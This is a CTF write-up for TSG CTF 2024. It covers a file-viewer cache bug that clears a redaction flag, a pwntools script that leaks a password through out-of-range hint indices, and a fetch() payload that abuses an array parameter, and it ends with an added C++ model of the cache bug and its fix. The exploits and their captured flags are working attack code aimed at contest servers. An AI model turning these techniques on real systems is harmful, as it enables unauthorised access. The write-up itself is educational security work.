# TSG CTF 2024 Writeup

![score.ctf.tsg.ne.jp_teams_214](https://hackmd.io/_uploads/S1nN8rn4kl.png)

## Misc

### Cached File Viewer

> I implemented a simple file viewer!
>
> \> ls ~
> 99-bottles-of-bear.txt chal diary.txt flag recipe.txt start.sh

```
if (arena.find(filename) != arena.end()) {
    // Cache hit: reuse the cached string and reset is_redacted to false
    items[index].str = arena[filename];
    items[index].is_redacted = false;
    return;
}
```

Reading `main.cpp` shows that when `load_file` loads content from the cache, `is_redacted` is set to `false`.
Calling `load_file` on `flag` twice and then calling `read` prints the contents of `flag`.

```
> nc 34.146.186.1 21001
1. load_file
2. read
3. bye
choice > 1
index > 0
filename > flag
Read 22 bytes.
1. load_file
2. read
3. bye
choice > 1
index > 0
filename > flag
1. load_file
2. read
3. bye
choice > 2
index > 0
content: TSGCTF{!7esuVVz2n@!Fm}
1. load_file
2. read
3. bye
choice > 3
Goodbye!
```

#### Flag

`TSGCTF{!7esuVVz2n@!Fm}`

## Pwn

### Password-Ate-Quiz

> It seems that if you enter the correct password, they will give you the flag.

```python
from pwn import *


def solve():
    io = remote('34.146.186.1', 41778)

    # First attempt: 31 bytes of 0x11 as the password guess
    io.recvuntil(b'Enter the password > ')
    io.sendline((chr(0x11) * 31).encode())

    # Hint numbers 4-7 and 8-11 lie outside the advertised 0~2 range
    password1 = b''
    for i in range(4, 8):
        io.recvuntil(b'Enter a hint number (0~2) > ')
        io.sendline(str(i).encode())
        password1 += io.recvline()[:-1]

    password2 = b''
    for i in range(8, 12):
        io.recvuntil(b'Enter a hint number (0~2) > ')
        io.sendline(str(i).encode())
        password2 += io.recvline()[:-1]

    # XOR the two returned blocks with the 0x11 filler, keeping printable bytes
    password = b''
    for (b1, b2) in zip(password1, password2):
        c = b1 ^ b2 ^ 0x11
        if chr(c).isprintable():
            password += bytes([c])

    # Leave the hint prompt and submit the recovered password
    io.sendline(b'a')
    io.recvuntil(b'Enter the password > ')
    io.sendline(password)

    io.recvline()
    flag = io.recvline().decode()

    io.close()

    return flag


if __name__ == '__main__':
    print(solve())
```

#### Flag

`TSGCTF{S74ck_h45_much_1nf0m4710n_81775684690}`

## Web

### Toolong Tea

> Recently it's getting colder in Tokyo which TSG is based in. Would you like to have a cup of hot oolong tea? It will warm up your body.

```js
fetch('/', {
  'method': 'POST',
  'headers': { 'content-type': 'application/json' },
  'body': JSON.stringify({ num: [65536, 1, 1] })
})
```

#### Flag

`TSGCTF{A_holy_night_with_no_dawn_my_dear...}`
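
Added example for the Cached File Viewer challenge above (not part of the original writeup or the challenge's `main.cpp`): a simplified model of the cache-hit path showing the redaction reset next to a corrected version that re-derives the decision on every load. Only `arena`, `items`, `str` and `is_redacted` come from the quoted snippet; the `Viewer` struct, the in-memory `disk`, the `must_redact` policy and the sample flag are assumptions made for illustration.

```cpp
#include <map>
#include <string>
#include <vector>

// Simplified model; only arena, items, str and is_redacted come from the snippet.
struct Item { std::string str; bool is_redacted = false; };

struct Viewer {
    std::map<std::string, std::string> disk;   // constructed stand-in for the filesystem
    std::map<std::string, std::string> arena;  // filename -> cached content
    std::vector<Item> items = std::vector<Item>(4);
    bool fixed;                                // false reproduces the behaviour in the writeup

    explicit Viewer(bool fixed_) : fixed(fixed_) {
        disk["flag"] = "FLAG{constructed-sample}";  // constructed sample data
        disk["diary.txt"] = "dear diary";
    }

    // Assumed policy: any file whose name contains "flag" must stay hidden.
    static bool must_redact(const std::string& name) {
        return name.find("flag") != std::string::npos;
    }

    void load_file(std::size_t index, const std::string& filename) {
        auto hit = arena.find(filename);
        if (hit != arena.end()) {
            items[index].str = hit->second;
            // Bug: the cache-hit path clears the redaction bit unconditionally.
            // Fix: recompute the decision from the filename on every path.
            items[index].is_redacted = fixed ? must_redact(filename) : false;
            return;
        }
        arena[filename] = disk.at(filename);    // cache miss: read and remember
        items[index].str = arena[filename];
        items[index].is_redacted = must_redact(filename);
    }

    std::string read(std::size_t index) const {
        return items[index].is_redacted ? "(redacted)" : items[index].str;
    }
};

// Load the same file twice into slot 0, then read it back.
std::string load_twice_then_read(bool fixed, const std::string& name) {
    Viewer v(fixed);
    v.load_file(0, name);
    v.load_file(0, name);
    return v.read(0);
}
```

The general point is that an access-control attribute has to travel with the cached object, or be recomputed on every path that returns it, rather than being set only where the data is first read.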